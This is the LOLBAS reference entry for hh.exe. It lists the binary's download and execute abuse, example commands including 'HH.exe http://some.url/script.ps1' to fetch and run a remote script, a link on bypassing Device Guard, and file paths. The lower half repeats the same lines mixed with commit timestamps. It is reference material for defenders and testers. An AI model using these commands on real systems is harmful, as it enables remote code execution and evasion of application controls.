LOLBAS/OSBinaries/Hh.md

## hh.exe

* Functions: Download, Execute

```
HH.exe http://www.google.com      

HH.exe C:\    

HH.exe c:\windows\system32\calc.exe    

HH.exe http://some.url/script.ps1    
```

Acknowledgements:
* Oddvar Moe - @oddvarmoe

Code sample:
* 

Resources:
* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

Full path:
```
c:\windows\system32\hh.exe
c:\windows\sysWOW64\hh.exe
```

Notes:
Added some more LOLBins 2018-04-19 00:06:48 +00:00			`## hh.exe`

Update Hh.md 2018-05-04 06:04:42 +00:00			`* Functions: Download, Execute`
Added some more LOLBins 2018-04-19 00:06:48 +00:00
			```
			`HH.exe http://www.google.com`

Update Hh.md 2018-05-04 06:04:42 +00:00			`HH.exe C:\`
Download and Execute with hh.exe hh.exe can be used to execute files by passing the filename as argument (e.g. c:\windows\system32\calc.exe) This even can be a URL. The file will be downloaded to C:\Users\<User>\AppData\Local\Microsoft\Windows\INetCache\Low\IE\<random 8 char string>\filename.ext 2018-05-03 14:40:50 +00:00
Update Hh.md 2018-05-04 06:04:42 +00:00			`HH.exe c:\windows\system32\calc.exe`
Download and Execute with hh.exe hh.exe can be used to execute files by passing the filename as argument (e.g. c:\windows\system32\calc.exe) This even can be a URL. The file will be downloaded to C:\Users\<User>\AppData\Local\Microsoft\Windows\INetCache\Low\IE\<random 8 char string>\filename.ext 2018-05-03 14:40:50 +00:00
Update Hh.md 2018-05-04 06:04:42 +00:00			`HH.exe http://some.url/script.ps1`
Added some more LOLBins 2018-04-19 00:06:48 +00:00			```

			`Acknowledgements:`
			`* Oddvar Moe - @oddvarmoe`

			`Code sample:`
			`*`

			`Resources:`
			`* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/`

			`Full path:`
			```
			`c:\windows\system32\hh.exe`
			`c:\windows\sysWOW64\hh.exe`
			```

			`Notes:`